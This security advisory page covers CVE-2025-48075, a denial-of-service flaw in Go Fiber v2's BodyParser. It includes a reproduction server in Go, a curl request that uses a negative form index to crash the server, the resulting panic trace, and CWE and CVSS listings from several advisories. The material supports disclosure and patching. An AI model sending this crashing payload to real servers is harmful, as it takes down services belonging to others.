Sign In

CVE-2025-48075

ADVISORY - github

Summary

Summary

When using the fiber.Ctx.BodyParser to parse into a struct with range values, a panic occurs when trying to parse a negative range index

Details

fiber.Ctx.BodyParser can map flat data to nested slices using key[idx]value syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data.

Since this data is user-provided, this could lead to denial of service for anyone relying on this fiber.Ctx.BodyParser functionality

Reproducing

Take a simple GoFiberV2 server which returns a JSON encoded version of the FormData

package main

import (
    "encoding/json"
    "fmt"
    "net/http"

    "github.com/gofiber/fiber/v2"
)

type RequestBody struct {
    NestedContent []*struct {
        Value string `form:"value"`
    } `form:"nested-content"`
}

func main() {
    app := fiber.New()

    app.Post("/", func(c *fiber.Ctx) error {
        formData := RequestBody{}
        if err := c.BodyParser(&formData); err != nil {
            fmt.Println(err)
            return c.SendStatus(http.StatusUnprocessableEntity)
        }
                c.Set("Content-Type", "application/json")
                s, _ := json.Marshal(formData)
                return c.SendString(string(s))
    })

    fmt.Println(app.Listen(":3000"))
}

Correct Behaviour Send a valid request such as:

curl --location 'localhost:3000' \
--form 'nested-content[0].value="Foo"' \
--form 'nested-content[1].value="Bar"'

You recieve valid JSON

{"NestedContent":[{"Value":"Foo"},{"Value":"Bar"}]}

Crashing behaviour Send an invalid request such as:

curl --location 'localhost:3000' \
--form 'nested-content[-1].value="Foo"'

The server panics and crashes

panic: reflect: slice index out of range

goroutine 8 [running]:
reflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)
        /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167
github.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})
[...]

Impact

Anyone using fiber.Ctx.BodyParser can/will have their servers crashed when an invalid payload is sent

EPSS Score: 0.00081 (0.245)

Common Weakness Enumeration (CWE)

ADVISORY - nist

CWE-129

Improper Validation of Array Index

ADVISORY - github

CWE-129

Improper Validation of Array Index

ADVISORY - gitlab

CWE-1035

OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

CWE-129

Improper Validation of Array Index

CWE-937

OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities

Impacted images

Advisories

NIST

CREATED

UPDATED

ADVISORY IDCVE-2025-48075
EXPLOITABILITY SCORE

3.9

EXPLOITS FOUND
COMMON WEAKNESS ENUMERATION (CWE)
CWE-129

CVSS SCORE

7.7high

GitHub

CREATED

UPDATED

ADVISORY IDGHSA-hg3g-gphw-5hhm
EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CWE-129

CVSS SCORE

7.7high

GoLang

CREATED

UPDATED

ADVISORY IDGO-2025-3706
EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

GitLab

CREATED

UPDATED

ADVISORY ID

CVE-2025-48075

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)
CWE-1035CWE-129CWE-937

CVSS SCORE

N/Aunspecified

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-5p55-h7qf-gjjc

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY